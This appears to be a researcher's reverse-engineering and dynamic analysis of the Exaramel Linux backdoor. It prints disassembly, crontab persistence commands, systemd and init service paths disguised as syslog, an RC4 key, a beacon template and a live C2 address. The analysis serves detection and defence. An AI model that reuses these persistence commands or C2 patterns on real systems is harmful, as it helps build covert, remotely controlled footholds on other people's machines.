###############################

0. Checking, cloning, and initiating run space.
1. Uses both a lock file (/tmp/.applock, a unix socket) &amp; futex to protect the running instance.
   i.e. a new instance of the binary exits because of the lock file; duplicate clones are controlled by futex.
2. Aims for persistence via cron &amp; systemd startup.
3. Reads the encrypted config file; if it does not exist, drops a hardcoded encrypted one.
4. Grabs information &amp; fills in the template for C2 callbacks.
5. C2 establishment: sends information after reading the config and starts listening.
6. Host resolving uses libnss; networking supports the system proxy.
7. Supports remote command execution.
8. My opinion: this is developer-made work, not the work of crooks.
9. Comments: https://twitter.com/malwaremustd1e/status/1216466744446840837

###############################
# Binary Analysis             #
###############################

1. Machine: Advanced Micro Devices X86-64
2. Symbol table &#039;.symtab&#039; contains 7726 entries.
3. go build ID
0x00400fd8  3133 3631 3236 3730 3763 6466 3136 6364  136126707cdf16cd
0x00400fe8  6133 3231 3562 6561 6435 3833 6331 6665  a3215bead583c1fe
0x00400ff8  3765 3237 3530 3636 48c7 4424 1000 0000  7e275066H.D$....
Notes at offset 0x00000fc8 with length 0x00000038:
  Owner         Data size       Description
  Go            0x00000028      Unknown note type: (0x00000004)
4. Program Headers:
  Type           Offset   VirtAddr           PhysAddr           FileSiz  MemSiz   Flg Align
  PHDR           0x000040 0x0000000000400040 0x0000000000400040 0x000188 0x000188 R   0x1000
  NOTE           0x000fc8 0x0000000000400fc8 0x0000000000400fc8 0x000038 0x000038 R   0x4
  LOAD           0x000000 0x0000000000400000 0x0000000000400000 0x248c80 0x248c80 R E 0x1000
  LOAD           0x249000 0x0000000000649000 0x0000000000649000 0x1ac10f 0x1ac10f R   0x1000
  LOAD           0x3f6000 0x00000000007f6000 0x00000000007f6000 0x02f7e0 0x052400 RW  0x1000
  GNU_STACK      0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW  0x8
  LOOS+5041580   0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000     0x8
5. Go version 1.8, going by this embedded path:
/usr/lib/go-1.8/lib/time/zoneinfo.zip

###############################
# Static Reversing Analysis   #
###############################

[0x00455940]&gt; pdf
┌ 18: entry0 (int64_t arg_8h);
│           ; arg int64_t arg_8h @ rsp+0x8
│           0x00455940      488d742408     lea rsi, [arg_8h]
│           0x00455945      488b3c24       mov rdi, qword [rsp]
│           0x00455949      488d05100000.  lea rax, [main] ; sym.go.main
│           ; 0x455960 ; &quot;H\x8d\x05\x89\xc2\xff\xff\xff\xe0\xcc\xcc\xcc\xcc\xcc\xcc\u030b|$\b\xb8\xe7&quot;
└           0x00455950      ffe0           jmp rax
--- more ---
     :
[0x00455940]&gt; s sym.main.main
[0x00647540]&gt; pd 6
            ; CODE XREF from sym.main.main @ 0x648803
            ;-- sym.go.main.main:
┌ 4808: sym.main.main ();
│ bp: 0 (vars 0, args 0)
│ sp: 105 (vars 105, args 0)
│ rg: 0 (vars 0, args 0)
│           0x00647540      64488b0c25f8.  mov rcx, qword fs:[0xfffffffffffffff8]
│           0x00647549      488d842408fc.  lea rax, [rsp - 0x3f8]
│           0x00647551      483b4110       cmp rax, qword [rcx + 0x10]
│     ┌─&lt; 0x00647555      0f86a3120000   jbe 0x6487fe
│     │    0x0064755b      4881ec780400.  sub rsp, 0x478
│     │    0x00647562      4889ac247004.  mov qword [var_470h], rbp
--- more ---
     :
[0x00647540]&gt; pdsf
;-- sym.go.main.main:                                                  
0x00647572 call sym.main.getCurrentDir
0x006475b4 call sym.runtime.concatstring2
0x006475d0 call sym.time.Now
0x00647618 call sym.time.Time.String
0x0064768a call sym.net.Listen
0x006476d0 call sym.runtime.makechan
0x00647727 call fcn.00454c1d fcn.00454c1d
0x006477ba call sym.os_signal.Notify
0x006477f9 call sym.runtime.newproc
0x0064783c call sym.runtime.newobject
0x0064787c call sym.app_vendor_configur.LoadConfig
0x00647905 obj.main.defaulthost.str // &lt;====== C2 placeholder var
0x00647968 call sym.app_vendor_configur.UpdateConfig
0x00647981 call sym.runtime.makechan
0x006479a7 call sym.runtime.makechan
0x006479cd call sym.runtime.makechan
0x006479ea call sym.runtime.newobject
0x00647a38 call sym.runtime.newobject
0x00647a63 call fcn.00454c20 fcn.00454c20
0x00647af4 call fcn.00454f96 fcn.00454f96
0x00647b01 call sym.app_vendor_worker.__Worker_.CheckAdapt
0x00647bbd call sym.app_vendor_worker.__Worker_.GetUser
0x00647be8 call sym.app_vendor_worker.__Worker_.GetOS
0x00647c27 call sym.runtime.newproc
0x00647c51 call fcn.00454bfa fcn.00454bfa
0x00647c77 call sym.runtime.newselect
0x00647ca2 call sym.runtime.selectrecv
--- more ---

// seek persistency #1

chdir(&quot;/var/spool/cron&quot;), 1) = 0;
execve(&quot;/bin/sh&quot;, [&quot;/bin/sh&quot;, &quot;-c&quot;, &quot;(crontab -l 2&gt;/dev/null) | grep /test/Exaramel &amp;&amp; echo &#039;true&#039; || echo &#039;false&#039;&quot;]) = 0;
execve(&quot;/usr/bin/crontab&quot;, [&quot;crontab&quot;, &quot;-l&quot;]) = 0;
execve(&quot;/bin/sh&quot;, [&quot;/bin/sh&quot;, &quot;-c&quot;, &quot;(crontab -l 2&gt;/dev/null; echo &#039;*/1 * * * * /test/Exaramel&#039;) | crontab -&quot;]) = 0;
execve(&quot;/bin/sh&quot;, [&quot;/bin/sh&quot;, &quot;-c&quot;, &quot;(crontab -l 2&gt;/dev/null; echo &#039;@reboot /test/Exaramel&#039;) | crontab -&quot;]) = 0;

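// persistence #2: stat() probes of service/init locations (rc.d, /etc/init, systemd, init.d) under syslog-like names; only the stat() calls are shown here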

stat(&quot;/etc/rc.d/syslogger&quot;,..) = 0;
stat(&quot;/etc/init/syslogd.conf&quot;,..) = 0;
stat(&quot;/etc/systemd/system/syslogd.service&quot;,..) = 0;
stat(&quot;/etc/init.d/syslogd&quot;,..) = 0;

// check user

execve(&quot;/bin/sh&quot;, [&quot;/bin/sh&quot;, &quot;-c&quot;, &quot;whoami&quot;]

// hardcoded template used for sending data to the c2 (same field order as the filled-in request body in the live memory dump further down):

generation=%d&amp;guid=%s&amp;platform=%s&amp;version=%d&amp;whoami=%s%0A 

// run lock (single instance): a unix socket at the path below

&quot;/tmp/.applock&quot;
code: getsockname(3, {sa_family=AF_FILE, path=&quot;/tmp/.applock&quot;}, [16])

// Command execution environment (Go os/exec is linked in and initialised)

0x32676 16 15 os/exec.Command
0x32686 23 22 os/exec.interfaceEqual
0x3269d 20 19 os/exec.(*Cmd).envv
0x326b1 21 20 os/exec.(*Cmd).stdin
0x326c6 22 21 os/exec.(*Cmd).stdout
0x326dc 22 21 os/exec.(*Cmd).stderr
0x326f2 32 31 os/exec.(*Cmd).writerDescriptor
0x32712 32 31 os/exec.(*Cmd).closeDescriptors
0x32732 21 20 os/exec.(*Cmd).Start
0x32747 27 26 os/exec.(*ExitError).Error
0x32762 20 19 os/exec.(*Cmd).Wait
0x32776 26 25 os/exec.(*Cmd).StdoutPipe
0x32790 26 25 os/exec.(*Cmd).StderrPipe
0x327aa 15 14 os/exec.init.1
0x327b9 23 22 os/exec.findExecutable
0x327d0 17 16 os/exec.LookPath
0x327e1 29 28 os/exec.interfaceEqual.func1
0x327fe 27 26 os/exec.(*Cmd).stdin.func1
0x32819 38 37 os/exec.(*Cmd).writerDescriptor.func1
0x3283f 27 26 os/exec.(*Cmd).Start.func1
0x3285a 27 26 os/exec.(*Cmd).Start.func2
0x32875 21 20 os/exec.init.1.func1
0x3288a 13 12 os/exec.init &lt;====
--- more ---
     :
// Decompiler output for the initialiser of the Go os/exec package (standard-library code, as the
// os/exec.* symbol names above indicate), listed here to show that command execution is set up.
// The flow is a three-state guard on obj.os_exec.initdone.: 0 = not started, 1 = running, 2 = finished.
void sym.os_exec.init(undefined8 param_1, undefined8 param_2, int64_t param_3)
{
    uint64_t *puVar1;
    int64_t extraout_RDX;
    int64_t in_FS_OFFSET;
    undefined8 uStack24;
    undefined8 uStack16;

    // Function prologue: a stack-bound comparison that calls runtime.morestack_noctxt while it holds.
    // BADSPACEBASE is how the decompiler renders the stack pointer (cmp rsp, ... in the disassembly below).
    while (puVar1 = (uint64_t *)(*(int64_t *)(in_FS_OFFSET + 0xfffffff8) + 0x10),
          *(BADSPACEBASE **)0x20 &lt; (undefined *)*puVar1 || (undefined *)*(BADSPACEBASE **)0x20 == (undefined *)*puVar1)
    {
        sym.runtime.morestack_noctxt(param_1, param_2, param_3);
        param_3 = extraout_RDX;
    }
    // initdone above 1: initialisation already finished, nothing to do.
    if (1 &lt; (uint8_t)obj.os_exec.initdone.) {
        return;
    }
    // initdone equal to 1 on entry: the initialiser was re-entered, runtime.throwinit is called.
    if (obj.os_exec.initdone. == (code)0x1) {
        sym.runtime.throwinit();
        do {
            invalidInstructionException();
        } while( true );
    }
    // Mark as running, then initialise every package os/exec depends on.
    obj.os_exec.initdone. = (code)0x1;
    sym.bytes.init();
    sym.context.init();
    sym.io.init();
    sym.os.init();
    sym.path_filepath.init();
    sym.runtime.init();
    sym.strconv.init();
    sym.strings.init();
    sym.sync.init();
    sym.syscall.init();
    // The value produced by errors.New is stored as os_exec.ErrNotFound; the second word goes to
    // 0x826548 either directly or through the runtime write barrier.
    sym.errors.New();
    _obj.os_exec.ErrNotFound = uStack24;
    if (_obj.runtime.writeBarrier == 0) {
        *(undefined8 *)0x826548 = uStack16;
    } else {
        sym.runtime.writebarrierptr();
    }
    // Run the package's own init.1, then mark initialisation as finished.
    sym.os_exec.init.1();
    obj.os_exec.initdone. = (code)0x2;
    return;
}
      :
; CALL XREF from sym.app_vendor_worker.init @ 0x64623b
;-- sym.go.os_exec.init:
/ 234: sym.os_exec.init ();
| bp: 0 (vars 0, args 0)
| sp: 4 (vars 4, args 0)
| rg: 0 (vars 0, args 0)
|           0x00623e10      mov rcx, qword fs:[0xfffffffffffffff8]
|           0x00623e19      cmp rsp, qword [rcx + 0x10]
|       ,=&lt; 0x00623e1d      jbe 0x623ef0
|       |   0x00623e23      sub rsp, 0x28
; ---------------------------
|       :   0x0064623b      call sym.os_exec.init                      ;[1]
|       :   0x00646240      call sym.path_filepath.init                ;[2]
|       :   0x00646245      call sym.regexp.init                       ;[3]
|       :   0x0064624a      call sym.runtime.init                      ;[4]
|       :   0x0064624f      call sym.strconv.init                      ;[5]
|       :   0x00646254      call sym.strings.init                      ;[6]
|       :   0x00646259      call sym.syscall.init                      ;[7]
|       :   0x0064625e      call sym.time.init                         ;[8]
|       :   0x00646263      mov byte [obj.app_vendor_worker.initdone.], 2    ; [0x843345:1]=0
|       :   0x0064626a      mov rbp, qword [rsp]
|       :   0x0064626e      add rsp, 8
--- more ---
     :
; CALL XREF from sym.main.init @ 0x648a74
;-- sym.go.app_vendor_worker.init:
/ 173: sym.app_vendor_worker.init ();
| bp: 0 (vars 0, args 0)
| sp: 0 (vars 0, args 0)
| rg: 0 (vars 0, args 0)
|           0x006461d0      mov rcx, qword fs:[0xfffffffffffffff8]
|           0x006461d9      cmp rsp, qword [rcx + 0x10]
|       ,=&lt; 0x006461dd      jbe 0x646273
|       |   0x006461e3      sub rsp, 8
; ---------------------------
|       :   0x00648a74      call sym.app_vendor_worker.init            ;[1]
|       :   0x00648a79      call sym.app_vendor_github.com_satori_go_2euuid.init ;[2]
|       :   0x00648a7e      mov byte [obj.main.initdone.], 2           ; [0x843374:1]=0
|       :   0x00648a85      mov rbp, qword [rsp]
|       :   0x00648a89      add rsp, 8
|       :   0x00648a8d      ret
|       :   ; CODE XREF from sym.main.init @ 0x6489fd
|       :   0x00648a8e      call sym.runtime.morestack_noctxt          ;[3]
\       `=&lt; 0x00648a93      jmp sym.main.init
            0x00648a98      int3
            0x00648a99      int3
--- more ---
     :
[0x00648a23 [xAdvc]0 0% 180 Exaramel]&gt; pd $r @ sym.main.init+51 # 0x648a23
|       :   ; CODE XREF from sym.main.init @ 0x648a18
|      ,==&lt; 0x00648a23      7507           jne 0x648a2c
|      |:   0x00648a25      e896e8ddff     call sym.runtime.throwinit  ;[1]
|      |:   0x00648a2a      0f0b           ud2
|      |:   ; CODE XREF from sym.main.init @ 0x648a23
|      `--&gt; 0x00648a2c      c60541a91f00.  mov byte [obj.main.initdone.], 1    ; [0x843374:1]=0
|       :   0x00648a33      e8d837e9ff     call sym.app_vendor_configur.init ;[2]
|       :   0x00648a38      e82310e7ff     call sym.fmt.init           ;[3]
|       :   0x00648a3d      e89e48e9ff     call sym.math_rand.init     ;[4]
|       :   0x00648a42      e8896becff     call sym.net.init           ;[5]
|       :   0x00648a47      e804bcfcff     call sym.app_vendor_network.init ;[6]
|       :   0x00648a4c      e8efdde4ff     call sym.os.init            ;[7]
|       :   0x00648a51      e86ad3fcff     call sym.os_signal.init     ;[8]
|       :   0x00648a56      e8e51ce9ff     call sym.path_filepath.init ;[9]
|       :   0x00648a5b      e8b02cfdff     call sym.app_vendor_scheduler.init ;[?]
|       :   0x00648a60      e8cbd8e1ff     call sym.strconv.init       ;[?]
|       :   0x00648a65      e8b6afe7ff     call sym.strings.init       ;[?]
|       :   0x00648a6a      e80172e3ff     call sym.syscall.init       ;[?]
|       :   0x00648a6f      e83c6ee4ff     call sym.time.init          ;[?]
|       :   0x00648a74      e857d7ffff     call sym.app_vendor_worker.init ;[?]
|       :   0x00648a79      e8f2e6ffff     call sym.app_vendor_github.com_satori_go_2euuid.init ;[?]
|       :   0x00648a7e      c605efa81f00.  mov byte [obj.main.initdone.], 2    ; [0x843374:1]=0
|       :   0x00648a85      488b2c24       mov rbp, qword [rsp]
|       :   0x00648a89      4883c408       add rsp, 8
|       :   0x00648a8d      c3             ret
--- more ---
     :
    if (1 &lt; (uint8_t)obj.main.initdone.) {
        return;
    }
    if (obj.main.initdone. == (code)0x1) {
        sym.runtime.throwinit();
        do {
            invalidInstructionException();
        } while( true );
    }
    obj.main.initdone. = (code)0x1;
    sym.app_vendor_configur.init();
    sym.fmt.init();
    sym.math_rand.init();
    sym.net.init();
    sym.app_vendor_network.init();
    sym.os.init();
    sym.os_signal.init();
    sym.path_filepath.init();
    sym.app_vendor_scheduler.init();
    sym.strconv.init();
    sym.strings.init();
    sym.syscall.init();
    sym.time.init();
    sym.app_vendor_worker.init();
    sym.app_vendor_github.com_satori_go_2euuid.init();
    obj.main.initdone. = (code)0x2;
    return;
}

// proxy is supported (Go net/http proxy functions are present)

0x005f8bc0   42 1298         sym.net_http.ProxyFromEnvironment
0x005f90e0    6 141          sym.net_http.ProxyURL
0x005fad00    7 248          sym.net_http.__connectMethod_.proxyAuth
0x005ffa30   67 1631         sym.net_http.useProxy
0x00607600    1 28           sym.net_http.ProxyURL.func1
--- more ---
     :
0x9788ea 36 35 net/http.(*connectMethod).proxyAuth
0x97961f 18 17 net/http.useProxy
0x97b757 24 23 net/http.ProxyURL.func1
0x9dbc43 22 21 net/http.httpProxyEnv
0x9dbc6d 23 22 net/http.httpsProxyEnv
0x9dc038 20 19 net/http.noProxyEnv
0x768d   22 21 net/http.httpProxyEnv
0x76a3   23 22 net/http.httpsProxyEnv
0x78de   20 19 net/http.noProxyEnv
0x2e857  30 29 net/http.ProxyFromEnvironment
0x2e875  18 17 net/http.ProxyURL
--- more ---
     :
// Decompiler output for net/http (*connectMethod).proxyAuth, Go standard-library code listed as
// evidence of proxy support. Arguments arrive on the stack (in_stack_*), and the values passed to
// and returned from the calls below are not visible in this rendering.
void sym.net_http.__connectMethod_.proxyAuth(undefined8 param_1, undefined8 param_2, int64_t param_3)
{
    uint64_t *puVar1;
    int64_t extraout_RDX;
    int64_t in_FS_OFFSET;
    int64_t *in_stack_00000008;
    undefined8 in_stack_00000010;
    undefined8 in_stack_00000018;

    // Function prologue: stack-bound comparison that calls runtime.morestack_noctxt while it holds.
    while (puVar1 = (uint64_t *)(*(int64_t *)(in_FS_OFFSET + 0xfffffff8) + 0x10),
          *(BADSPACEBASE **)0x20 &lt; (undefined *)*puVar1 || (undefined *)*(BADSPACEBASE **)0x20 == (undefined *)*puVar1)
    {
        sym.runtime.morestack_noctxt(param_1, param_2, param_3);
        param_3 = extraout_RDX;
    }
    // Only when the first stack argument points at a non-zero value whose field at +0x20 is also
    // non-zero does the function call basicAuth and concatstring2; presumably this builds the proxy
    // credential string from a configured proxy URL (confirm against the net/http source).
    if (*in_stack_00000008 != 0) {
        if (*(int64_t *)(*in_stack_00000008 + 0x20) != 0) {
            sym.net_http.basicAuth();
            sym.runtime.concatstring2();
            return;
        }
        return;
    }
    return;
}
--- more ---
     :
 ; CODE XREF from sym.net_http.__connectMethod_.proxyAuth @ 0x5fadf3
 ; CALL XREFS from sym.net_http.__Transport_.dialConn @ 0x5fe1b1, 0x5ff325
 ;-- sym.go.net_http.__connectMethod_.proxyAuth:
/ 248: sym.net_http.__connectMethod_.proxyAuth (int64_t arg_8h, int64_t arg_10h, int64_t arg_18h);
| bp: 0 (vars 0, args 0)
| sp: 10 (vars 7, args 3)
| rg: 0 (vars 0, args 0)
|           0x005fad00      mov rcx, qword fs:[0xfffffffffffffff8]
|           0x005fad09      cmp rsp, qword [rcx + 0x10]
|       ,=&lt; 0x005fad0d      jbe 0x5fadee
|       |   0x005fad13      sub rsp, 0x40
; ---------------------------
|           0x005fe1b1      call sym.net_http.__connectMethod_.proxyAuth ;[1] M=======
|           0x005fe1b6      mov rax, qword [var_4b0h]
|           0x005fe1bb      mov rcx, qword [var_4b8h]
|           0x005fe1c0      test rax, rax
|       ,=&lt; 0x005fe1c3      jne 0x5ff1c6
|       |   ; CODE XREF from sym.net_http.__Transport_.dialConn @ 0x5ff1fa
|       |   0x005fe1c9      lea rax, [0x0068f0a0]
|       |   0x005fe1d0      mov qword [rsp], rax
|       |   0x005fe1d4      mov rax, qword [var_300h]
|       |   0x005fe1dc      mov qword [var_4b8h], rax
|       |   0x005fe1e1      mov rcx, qword [var_2f8h]
--- more ---
     :
;-- sym.go.net_http.__Transport_.dialConn:
0x005fda2d call sym.runtime.newobject
0x005fda58 int64_t arg1
0x005fda5c int64_t arg2
0x005fda6e call fcn.00454fa4 fcn.00454fa4
0x005fda7b call sym.net_http.__connectMethod_.key
0x005fda80 int64_t arg2
0x005fda85 int64_t arg1
0x005fda97 call fcn.00454f96 fcn.00454f96
0x005fdab4 call sym.runtime.makechan
   :
0x005fdb69 call sym.runtime.newobject
0x005fdbad int64_t arg2
0x005fdbbf call fcn.00454f96 fcn.00454f96
0x005fdc8f call sym.net_http_httptrace.ContextClientTrace
0x005fdd41 call sym.net_http.__connectMethod_.addr ;&quot;tcp -&gt;  &lt;== ==&gt; @@@ MB) \r\t\n as  at  fp= in  is  lr: of  on  pc= sp: sp=!= 0%x\r\n&amp;gt;&amp;lt;&#039;\&#039;&quot;
0x005fdd7d call rcx
0x005fde21 call sym.crypto_tls.__Conn_.Handshake
0x005fde70 call sym.runtime.newproc
0x005fdeeb call fcn.00454f34 fcn.00454f34
0x005fdf17 call rbx
0x005fdf29 call sym.runtime.newobject
0x005fdf47 call sym.crypto_tls.__Conn_.ConnectionState
--- end ---

// drop config

openat(AT_FDCWD, &quot;{current dir}config.json&quot;, 1|2|0|0, 0666) = 0 ;

// the data below is written to the file, encrypted (call: Go crypto RC4 library)

0x006f9990  6874 7470 733a 2f2f 3137 362e 3331 2e32  https://176.31.2
0x006f99a0  3235 2e32 3034 2f61 7069 2f76 3100 0000  25.204/api/v1...

// encryption key :

in:
[0x006da25a [xAdvc]0 37% 16384 Exaramel]&gt; pd $r @ hit2_0
        ; DATA XREFS from sym.main.main @ 0x647823, 0x6486eb  
│        0x00647787      488d8c249800.  lea rcx, [var_98h]
│        0x0064778f      48898c24b002.  mov qword [var_2b0h], rcx
│        0x00647797      48890424       mov qword [rsp], rax
│        0x0064779b      488d8c247802.  lea rcx, [var_278h]
│        0x006477a3      48894c2408     mov qword [var_8h], rcx
│        0x006477a8      48c744241004.  mov qword [var_10h], 4
│        0x006477b1      48c744241804.  mov qword [var_18h], 4
│        0x006477ba      e8e1defcff     call sym.os_signal.Notify
│        0x006477bf      488b84242001.  mov rax, qword [var_120h]
│        0x006477c7      4889442410     mov qword [var_10h], rax 
│        0x006477cc      488b84244001.  mov rax, qword [var_140h]
│        0x006477d4      4889442418     mov qword [var_18h], rax 
│        0x006477d9      488b8c244801.  mov rcx, qword [var_148h]
│        0x006477e1      48894c2420     mov qword [var_20h], rcx 
│        0x006477e6      c70424180000.  mov dword [rsp], 0x18 
│        0x006477ed      488d1534160a.  lea rdx, [0x006e8e28] 
│        0x006477f4      4889542408     mov qword [var_8h], rdx 
│        0x006477f9      e8729cdeff     call sym.runtime.newproc
│        0x006477fe      488b05c3e71d.  mov rax, qword [0x00825fc8]
│        0x00647805      4885c0         test rax, rax 
│  ┌─&lt; 0x00647808      7527           jne 0x647831  
│  │    0x0064780a      48c705b3e71d.  mov qword [0x00825fc8], 0xa 
│  │    0x00647815      8b0515bf1f00   mov eax, dword [obj.runtime.writeBarrier]
│  │    0x0064781b      85c0           test eax, eax 
│┌──&lt; 0x0064781d      0f85bd0e0000   jne 0x6486e0  
│││    0x00647823      488d05302a09.  lea rax, [hit2_0] ; 0x6da25a ; &quot;s0m3t3rr0r&quot; &lt;======KEY!!
│││    0x0064782a      4889058fe71d.  mov qword [obj.main.key], rax 
--- more ---
     :
0x006da25a [xAdvc]0 37% 16384 Exaramel]&gt; ps 
0x006da25a &lt;nil&gt;runtime: s0m3t3rr0r(++junk)

// config

~/test$ r2 config.json 
 -- Invert the block bytes using the &#039;I&#039; key in visual mode
[0x00000000]&gt; px
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0x00000000  4f65 e400 ded5 2b33 3a61 37b5 1fd8 ffdf  Oe....+3:a7.....
0x00000010  9f57 b918 6d1e e9b8 8116 057f a636 08e2  .W..m........6..
0x00000020  4b5a 15c1 57a1 a0e9 1297 49e8 2942 8f78  KZ..W.....I.)B.x
0x00000030  e267 95ad aead 0846 5074 d17f 9eab e8c6  .g.....FPt......
0x00000040  7c29 d378 4fd7 5071 c311 53f5 de02 32d0  |).xO.Pq..S...2.
0x00000050  3e93 45e8 de72 a424 70fb 00e0 f30f 5be0  &gt;.E..r.$p.....[.
0x00000060  37eb 47a9 d57e ebee 583f 339c 5672 23c4  7.G..~..X?3.Vr#.
0x00000070  adbf d997 2f99 5a7f 063c 9ba5 7028 15b7  ..../.Z..&lt;..p(..
0x00000080  3ce6 da90 98ae 8c34 f8b2 0331 a445 d517  &lt;......4...1.E..
0x00000090  a946 173b c506 c450 0f9e 6a48 d068 b6c8  .F.;...P..jH.h..
0x000000a0  ffff ffff ffff ffff ffff ffff ffff ffff  ................

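// the file is RC4-encrypted with the key above and can be decrypted with any RC4 implementation:
// (note: the Guid in this config differs from the guid seen in the live memory dump further down, so it looks generated per run or install and should not be used as an indicator on its own)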

{&quot;Hosts&quot;:[&quot;https://176.31.225.204/api/v1&quot;],&quot;Proxy&quot;:&quot;&quot;,&quot;Version&quot;:&quot;1&quot;,&quot;Guid&quot;:&quot;c65f5f15-2e64-4b41-9c95-59f0d94f5fca&quot;,&quot;Next&quot;:20,&quot;Datetime&quot;:&quot;&quot;,&quot;Timeout&quot;:30,&quot;Def&quot;:20}

// c2 

0x6f9990 30 29 https://176.31.225.204/api/v1

// the C2 callback can be observed at OS level (syscall trace) as:

connect(6, {sa_family=AF_INET, sin_port=htons(443), sin_addr=inet_addr(&quot;176.31.225.204&quot;)

// file enumeration (this happened before C2 networking started, per clone)

getdents64($SOCKET, {{d_ino=$INODENUM, d_off=$OFFSETNUM,..
loop 
 {
   lstat(&quot;{$CURRPATH}/{files}&quot;..);
   openat(AT_FDCWD, &quot;{$CURRPATH}/{$DIRS}&quot;..
  }
getdents64($SOCKET, {}, $MMAP);
close($SOCKET);

###############################
# Dynamic Analysis            #
###############################

// works (the sample runs): memory map of the process, then three open-file listings

00400000-00649000 r-xp 00000000 08:01 397381             /test/Exaramel
00649000-007f6000 r--p 00249000 08:01 397381             /test/Exaramel
007f6000-00826000 rw-p 003f6000 08:01 397381             /test/Exaramel
00826000-00849000 rw-p 00000000 00:00 0
c000000000-c000001000 rw-p 00000000 00:00 0
c41fff8000-c420100000 rw-p 00000000 00:00 0
7f32836ed000-7f328378d000 rw-p 00000000 00:00 0
7fff6fc00000-7fff6fc21000 rw-p 00000000 00:00 0          [stack]
7fff6fdb9000-7fff6fdba000 r-xp 00000000 00:00 0          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0  [vsyscall]

Exaramel  cwd    DIR                8,1     4096  397369 /test
Exaramel  rtd    DIR                8,1     4096       2 /
Exaramel  txt    REG                8,1  6469139  397381 /test/Exaramel
Exaramel    0u   CHR              136,0      0t0       3 /dev/pts/0
Exaramel    1u   CHR              136,0      0t0       3 /dev/pts/0
Exaramel    2u   CHR              136,0      0t0       3 /dev/pts/0
Exaramel    3u  unix 0xffff88000f2c6480      0t0    6334 /tmp/.applock
Exaramel    4u  0000                0,9        0    1203 anon_inode
Exaramel    5r   CHR                1,9      0t0    1210 /dev/urandom
Exaramel    6r  FIFO                0,8      0t0    6350 pipe
Exaramel    8r  FIFO                0,8      0t0    6351 pipe

Exaramel  cwd    DIR                8,1     4096  397369 /test
Exaramel  rtd    DIR                8,1     4096       2 /
Exaramel  txt    REG                8,1  6469139  397381 /test/Exaramel
Exaramel    0u   CHR              136,0      0t0       3 /dev/pts/0
Exaramel    1u   CHR              136,0      0t0       3 /dev/pts/0
Exaramel    2u   CHR              136,0      0t0       3 /dev/pts/0
Exaramel    3u  unix 0xffff88000f2c6480      0t0    6334 /tmp/.applock
Exaramel    4u  0000                0,9        0    1203 anon_inode
Exaramel    5r   CHR                1,9      0t0    1210 /dev/urandom
Exaramel    6r  IPv4               6424      0t0     TCP $LOCAL:34573-&gt;176.31.225.204:443

Exaramel  cwd    DIR                8,1     4096  397369 /test
Exaramel  rtd    DIR                8,1     4096       2 /
Exaramel  txt    REG                8,1  6469139  397381 /test/Exaramel
Exaramel    0u   CHR              136,0      0t0       3 /dev/pts/0
Exaramel    1u   CHR              136,0      0t0       3 /dev/pts/0
Exaramel    2u   CHR              136,0      0t0       3 /dev/pts/0
Exaramel    3u  unix 0xffff88000f2c6480      0t0    6334 /tmp/.applock
Exaramel    4u  0000                0,9        0    1203 anon_inode
Exaramel    5r   CHR                1,9      0t0    1210 /dev/urandom

// Live radare2 forensics (before)

0xc4200a6440 2304 /test/Exaramel]&gt; pxx @ obj.runtime.enoptrbss+528867392 # 0xc4200a6440
- offset -     0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF
0xc4200a6440  Access-Control-Allow-Origin.....Content-Disposition.............
0xc4200a6480  If-Unmodified-Since.............Proxy-Authenticate..............
0xc4200a64c0  Proxy-Authorization.............Strict-Transport-Security.......
0xc4200a6500  Transfer-Encoding...............config.json.....................
0xc4200a6540  ..m...............m...............m.....................`.. ....
0xc4200a6580  listen unix /tmp/.applock.......bind: address already in use....
0xc4200a65c0  App has already started!.......................................
 
// Live radare2 forensics (after)
   :
0xc42000ed90  Authorization...Content-EncodingContent-LocationContent-Range...Expect..If-MatchLinkMax-
0xc42000ede8  ForwardsRangeReferer....RefreshTrailer..Retry-After.....Vary100101102200Www-Authenticate
0xc42000ee40  201202203204205.206207208226300.301302303304305.307308400401402.403404405406407.40840941
0xc42000ee98  0411412.413414415416417.418422423424426.428429431451500.501502503504505.506507508510511.
0xc42000eef0  $.m.............j6n.....&amp;.........m..............!n..............bn.....4.........m.....
0xc42000ef48  ......../test/`........ E. ..../tmp/.applock............................................
0xc42000efa0  rH..*.E?.[......&amp;.............../dev/urandom............@.. ............................
0xc42000eff8  ................................Hosts...................Proxy...................Version.
0xc42000f050  ................Guid....................Next....................Datetime................
0xc42000f0a8  Timeout.................Def.............................................................
   :
0xc42000f408  /bin/sh................./bin/sh.-c......SHELL=/bin/bash.TERM=vt100......HUSHLOGIN=FALSE.
0xc42000f460  USER=nyan_apt....SHLVL=1.........HOME=/test.LOGNAME=test......._=./Exaramel...1.m.......
0xc42000f4b8  ........`.......... ....`.......... ..../dev/null.......... ....... ....................
0xc42000f510  /bin/sh./bin/sh.-c.whoami.......SHELL=/bin/bash.TERM=vt100......HUSHLOGIN=FALSE.USER=nyan
0xc42000f568  _apt.....SHLVL=1.mung....HOME=/test..LOGNAME=test...._=./Exaramel........test../bin/uname
0xc42000f5c0  `.m............./usr/bin/uname../usr/bin/uname../bin/uname......`.......... ....`.......
0xc42000f618  ... ..../dev/null.......... ....... ............uname.................../bin/uname......
0xc42000f670  -a.TERM=vt100...SHELL=/bin/bash.HUSHLOGIN=FALSE.USER=test....SHLVL=1.nyan_apt%0A.HOME=/te
0xc42000f6c8  st.LOGNAME=test...._=./Exaramel..........`.....@.. ....... ....$.......... .............
0xc42000f720  P.. ....I.........m...............m...........nyan_apt%0A...............................
  :
0xc42004a36f  .*/1 * * * * /test/Exaramel.@reboot /test/Exaramel.true.................................
0xc42004a4cf  ..`. ............................................Linux xxxxxxxxxxxxxxxxxxxxxxxxxx #1 SMP
0xc42004a527   xxxxxxxxxxxxxxxxxxxxxx GNU/Linux.......................................................
0xc42004c660  (crontab -l 2&gt;/dev/null) | grep //test/Exaramel &amp;&amp; echo &#039;true&#039; || echo &#039;false&#039;.........
  :
0xc420053148  ........................................................................................
0xc4200531a0  /etc/systemd/system/syslogd.service.....................................................
0xc4200531f8  ........................................................................................
  :
0xc4200533d3  ........................................................................................
0xc42005342b  .....................https://176.31.225.204/api/v1/auth/app.............................
0xc420053483   .............................q`........ ...............................................
  :
0xc4200551e0  generation=1&amp;guid=7248d60f-2a8f-453f-ac5b-19f5e0d7a3b0&amp;platform=Linux+xxxxxxxxxxxxxxxxx
